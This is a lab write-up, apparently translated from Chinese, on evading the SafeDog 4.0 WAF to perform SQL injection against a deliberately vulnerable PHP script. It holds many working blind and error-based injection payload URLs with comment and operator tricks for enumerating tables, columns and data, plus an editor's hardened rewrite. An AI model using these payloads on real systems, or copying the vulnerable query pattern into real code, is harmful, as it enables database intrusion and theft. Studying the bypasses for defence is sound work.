Bypassing the new version of 安全狗 (SafeDog) for SQL injection


First off, I built the environment with phpstudy + 安全狗 4.0.
At first I couldn't find the Apache service name, and following the instructions online didn't work either (a pile of the same rubbish reposted everywhere).

Solution:

Run cmd as administrator, cd into the apache/bin directory:
httpd -k install -n apache2.4

Run cmd as administrator, cd into the mysql/bin directory (mysqld takes --install rather than -k install):
mysqld --install MySQla

 

The PHP code is as follows:

<?php
$username="root";
$password="root";
$host="localhost:3306";
$database="test";
$con=mysqli_connect($host,$username,$password,$database);
if(!$con){
    exit("Connect mysql failed....");
}
if(isset($_GET['id'])){
    // deliberately vulnerable: the raw GET parameter is concatenated into the query
    $sql="select * from demo where id=".$_GET['id'];
    echo $sql;
    echo "<br>";
    $cha=mysqli_query($con,$sql);
    $jg=mysqli_fetch_array($cha);
    var_dump($jg);
}
?>

The database table and fields are as follows:
[screenshot: EpaxK0.png]

Trying and 1=1 and and 1=2 is, unsurprisingly, blocked.

[screenshot: EpamNQ.png]

Use %26%26 True and %26%26 False

%26 = &
& = and
[screenshot: EparDK.png]
[screenshot: EpdA2R.png]

Using Xor True and Xor False isn't blocked either.

[screenshot: Epd8xI.md.png]
[screenshot: EpwFw8.png]

order by can be bypassed with inline comments:

http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/

[screenshot: EpwQmV.md.png]
[screenshot: EpwJfJ.png]

union select got stuck... couldn't bypass it no matter what, so later I went and did blind injection instead.

[screenshot: EpBDRH.md.png]

and length(database())=8 gets killed; after reading some articles online, writing @@version and database/**/() like this doesn't get killed.

http://127.0.0.1/sqli.php?id=1 %26%26 (length(database/**/())=4)

[screenshot: EpBcLt.png]

http://127.0.0.1/sqli.php?id=1 %26%26 (ascii(@@version)=53)

[screenshot: EpBOoT.png]

Work out how many tables there are:

http://127.0.0.1/sqli.php?id=1 %26%26 (1=(select count(/*!table_name*/) from information_schema.tables where table_schema=0x74657374))

[screenshot: EpDkTK.png]

Guessing table names: ascii gets blocked here, and table_name is blocked too.

[screenshot: Eprn4U.md.png]

Use the hex function instead of ascii, and use count(/*!table_name*/):

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!table_name*/) from information_schema.tables where table_schema=0x74657374 limit 0,1),1,1)))

[screenshot: Ep6lvQ.md.png]

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!table_name*/) from information_schema.tables where table_schema=0x74657374 limit 0,1),1,1))=64)

[screenshot: Ep6N5V.png]

Guess the number of columns:

http://127.0.0.1/sqli.php?id=1 %26%26 (2=(select count(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F))

[screenshot: Ep6rr9.png]

Guess the column names:

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F limit 0,1),1,1)))

[screenshot: EpccLj.png]

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!column_name*/) from information_schema.columns where table_name=0x64656D6F limit 0,1),1,1))=69)

[screenshot: EpcHOJ.md.png]

Guess how many rows of column content there are:

http://127.0.0.1/sqli.php?id=1 %26%26 (1=(select count(/*!name*/) from demo))

Guess the column content:

http://127.0.0.1/sqli.php?id=1 %26%26 (hex(substr((select concat(/*!name*/) from demo limit 0,1),1,1))=64)

[screenshot: Epgb38.png]

Error-based injection bypassing 安全狗
Modify the PHP code:

<?php
$username="root";
$password="root";
$host="localhost:3306";
$database="test";
$con=mysqli_connect($host,$username,$password,$database);
if(!$con){
    exit("Connect mysql failed....");
}
if(isset($_GET['id'])){
    // deliberately vulnerable: the raw GET parameter is concatenated into the query
    $sql="select * from demo where id=".$_GET['id'];
    echo $sql;
    echo "<br>";
    $cha=mysqli_query($con,$sql);
    // check the query result itself; fetching from a false result throws on PHP 8
    if($cha===false){
        $error=mysqli_error($con);
        echo $error;
        exit();
    }
    $jg=mysqli_fetch_array($cha);
    var_dump($jg);
}
?>

updatexml(1,,1) # 安全狗's regex matches (1,content,1) and kills it no matter what's inside; it also filters concat(0x7e,,0x7e). In short, it filters the comma, so I fiddled with all kinds of error-based injection for half a day.
[screenshot: Ep2HaR.md.png]

Then I dug an article out of Evernote = = the tricks in it were pretty slick.

http://127.0.0.1/sqli.php?id=1-a()

Using a function that doesn't exist is enough to get the database name.

[screenshot: EpOErR.png]

Entering an existing column name gets you: the database name, table name and column name.
You can take sqlmap's column-name wordlist and brute-force it with Burp.

http://127.0.0.1/sqli.php?id=1 %26%26 polygon(id)
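For contrast, here is a hardened version of the post's sqli.php, added as an example by the editor and not part of the original post. It assumes the same test setup the post describes (database test, table demo with an id column and a name column, root/root credentials on localhost:3306); the fetchDemoRow function name and the explicit column list are assumptions. It removes the two things every payload above depends on: string concatenation of id into the query, and mysqli_error() being echoed back to the client.

```php
<?php
// Added example (not from the original post): hardened version of sqli.php.
// Assumes the post's constructed test database: database "test", table "demo"
// with columns "id" (integer) and "name".
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false

function fetchDemoRow(mysqli $con, string $rawId): ?array
{
    // 1. Validate the input shape before it reaches SQL: id must be a plain
    //    decimal integer. "1 && (...)", "1-a()" or inline comments never get
    //    near the database, regardless of what a WAF in front of us does.
    if (!preg_match('/^[0-9]{1,10}$/', $rawId)) {
        return null;
    }
    $id = (int) $rawId;

    // 2. Prepared statement with a bound parameter: the query text is fixed at
    //    prepare time, so the value can never change its structure.
    $stmt = $con->prepare('SELECT id, name FROM demo WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$con = new mysqli('localhost', 'root', 'root', 'test', 3306);

if (isset($_GET['id'])) {
    try {
        $row = fetchDemoRow($con, (string) $_GET['id']);
    } catch (mysqli_sql_exception $e) {
        // 3. Log the real MySQL error server-side; never echo it to the client.
        //    Echoing mysqli_error() is exactly what the error-based section
        //    of the post relies on.
        error_log('demo lookup failed: ' . $e->getMessage());
        http_response_code(500);
        exit('internal error');
    }
    header('Content-Type: application/json');
    echo json_encode($row, JSON_THROW_ON_ERROR); // null when no row or bad input
}
```

Drop this in beside the original sqli.php and replay the post's URLs against it: every request whose id is not a bare integer returns null without a query being sent, and a genuine database error produces a generic 500 rather than the MySQL message.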